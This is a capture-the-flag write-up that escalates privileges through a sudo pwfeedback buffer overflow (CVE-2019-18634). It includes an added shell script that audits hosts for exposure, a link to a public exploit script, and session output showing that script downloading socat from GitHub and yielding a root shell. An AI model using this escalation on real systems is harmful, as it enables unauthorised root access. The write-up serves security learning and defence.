# Humpty Dumpty's SSH Account
by mito

## 33 Solves, 460pt

The challenge is to connect to the server with `ssh`, elevate to root privileges, and read the flag.

```
$ ssh [email protected] -p 41701
[email protected]'s password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

Warning: Security update available for a system command
humptydumpty@22edcaca289b:~$ ls -l
total 4
-r-------- 1 root root 38 Apr 17 01:58 flag
humptydumpty@22edcaca289b:~$
```

When we try to read the flag with the `sudo` command, the following message is displayed and the password we type is echoed as `*` characters.

```
humptydumpty@22edcaca289b:~$ sudo cat flag

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

Password: ****** <-- here
```

We found that the `sudo` command has been replaced: `which sudo` resolves to `/usr/local/bin/sudo` rather than the distribution's packaged binary.

```
humptydumpty@22edcaca289b:~$ which sudo
/usr/local/bin/sudo
humptydumpty@22edcaca289b:~$ ls -l /usr/local/bin/
total 664
-rwsr-xr-x 1 root root 519216 Apr 15 03:59 sudo
lrwxrwxrwx 1 root root 4 Apr 15 03:59 sudoedit -> sudo
-rwxr-xr-x 1 root root 157088 Apr 15 03:59 sudoreplay
```

Since the typed password is echoed as asterisks (sudo's `pwfeedback` option), this custom `sudo` may be vulnerable to `CVE-2019-18634`, the `pwfeedback` buffer overflow.
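The two observations above (an unexpected `sudo` binary path and password feedback turned on) are exactly what a defender would want to check on a fleet. The following audit helper is an added example for this writeup, not code from the challenge or from the exploit repository linked below. It assumes the affected range is sudo 1.7.1 through 1.8.30 inclusive (fixed in 1.8.31), reads sudoers text from stdin so it can be tested offline, and treats `/usr/bin/sudo` and `/bin/sudo` as the expected packaged locations; the sample `sudo --version` output and sudoers lines in the comments are constructed.

```shell
#!/bin/sh
# Added audit helper (not part of the writeup): checks whether a host's sudo is
# exposed to CVE-2019-18634, the pwfeedback stack overflow.
# Assumptions: affected versions are 1.7.1..1.8.30 (fixed in 1.8.31); sudoers
# text is supplied on stdin; packaged sudo lives in /usr/bin or /bin.

# parse_sudo_version: reads `sudo --version` output on stdin and prints e.g.
# "1.8.21" (constructed input: "Sudo version 1.8.21p2"); the "p2" patch suffix
# is dropped, which is enough for the range check below.
parse_sudo_version() {
    sed -n 's/^Sudo version \([0-9][0-9.]*\).*/\1/p' | head -n 1
}

# version_to_int 1.8.21 -> 10821 (major*10000 + minor*100 + patch), so versions
# can be compared with plain integer tests in POSIX sh.
version_to_int() {
    v=$(printf '%s' "$1" | sed 's/p[0-9]*$//')
    maj=$(printf '%s' "$v" | cut -d. -f1)
    min=$(printf '%s' "$v" | cut -d. -f2)
    pat=$(printf '%s' "$v" | cut -d. -f3)
    printf '%d\n' $(( ${maj:-0} * 10000 + ${min:-0} * 100 + ${pat:-0} ))
}

# is_affected_version VERSION: succeeds when VERSION is within 1.7.1..1.8.30.
is_affected_version() {
    n=$(version_to_int "$1")
    if [ "$n" -ge 10701 ] && [ "$n" -le 10830 ]; then
        return 0
    fi
    return 1
}

# sudoers_has_pwfeedback: reads sudoers text on stdin; succeeds when an
# uncommented Defaults line enables pwfeedback. "!pwfeedback" does not match.
# This is a conservative flag: any enabling line is reported, even though a
# later "!pwfeedback" in sudoers would win.
sudoers_has_pwfeedback() {
    grep -v '^[[:space:]]*#' \
      | grep -E '^[[:space:]]*Defaults' \
      | grep -Eq '(^|[[:space:],])pwfeedback([[:space:],]|$)'
}

# sudo_path_is_expected PATH: the challenge's replaced sudo lived in
# /usr/local/bin; a package-managed sudo normally resolves to /usr/bin/sudo.
sudo_path_is_expected() {
    case "$1" in
        /usr/bin/sudo|/bin/sudo) return 0 ;;
        *) return 1 ;;
    esac
}

# assess VERSION < sudoers-text: prints a single verdict line.
assess() {
    if ! is_affected_version "$1"; then
        echo "not affected: sudo $1 is outside 1.7.1..1.8.30"
    elif sudoers_has_pwfeedback; then
        echo "VULNERABLE: sudo $1 with pwfeedback enabled"
    else
        echo "affected version $1 but pwfeedback is off; upgrade to 1.8.31 or later"
    fi
}

# audit_live_system: runs the checks against the real host. Reading
# /etc/sudoers needs root; without it the pwfeedback check sees empty input.
audit_live_system() {
    bin=$(command -v sudo) || { echo "no sudo in PATH"; return 1; }
    sudo_path_is_expected "$bin" || echo "WARNING: sudo resolves to $bin, not the packaged binary"
    ver=$("$bin" --version 2>/dev/null | parse_sudo_version)
    [ -n "$ver" ] || { echo "could not parse sudo version from $bin"; return 1; }
    cat /etc/sudoers /etc/sudoers.d/* 2>/dev/null | assess "$ver"
}

# Only touch the live system when explicitly asked: `sh audit.sh --live`
if [ "${1:-}" = "--live" ]; then
    audit_live_system
fi
```

Run with `--live` (as root, so that sudoers is readable) to get the host verdict; without arguments the file only defines the functions, which is what makes the pieces testable with constructed input such as `printf 'Defaults pwfeedback\n' | assess 1.8.21`.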

We used the following exploit code.

[https://github.com/Plazmaz/CVE-2019-18634/blob/master/self-contained.sh](https://github.com/Plazmaz/CVE-2019-18634/blob/master/self-contained.sh)

After running the exploit code, we were able to elevate to root privileges.

```
humptydumpty@22edcaca289b:/tmp$ vi exp.sh <-- https://github.com/Plazmaz/CVE-2019-18634/blob/master/self-contained.sh
humptydumpty@22edcaca289b:/tmp$ sh exp.sh
--2020-04-29 12:25:03-- https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.248.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.248.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 375176 (366K) [application/octet-stream]
Saving to: ‘socat’

socat 100%[=============================>] 366.38K --.-KB/s in 0.07s

2020-04-29 12:25:03 (4.80 MB/s) - ‘socat’ saved [375176/375176]

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

Password:
Sorry, try again.
Sorry, try again.
root@22edcaca289b:/tmp# exit
sudo: 2 incorrect password attempts
Exploiting!
root@22edcaca289b:/tmp# id
uid=0(root) gid=1000(humptydumpty) groups=1000(humptydumpty)
```

We were able to read the flag.

```
root@22edcaca289b:/tmp# cd /home/humptydumpty
root@22edcaca289b:/home/humptydumpty# ls
flag
root@22edcaca289b:/home/humptydumpty# cat flag
flag{7h3_vu1n!_i5?...CVE_2019-18634!}
```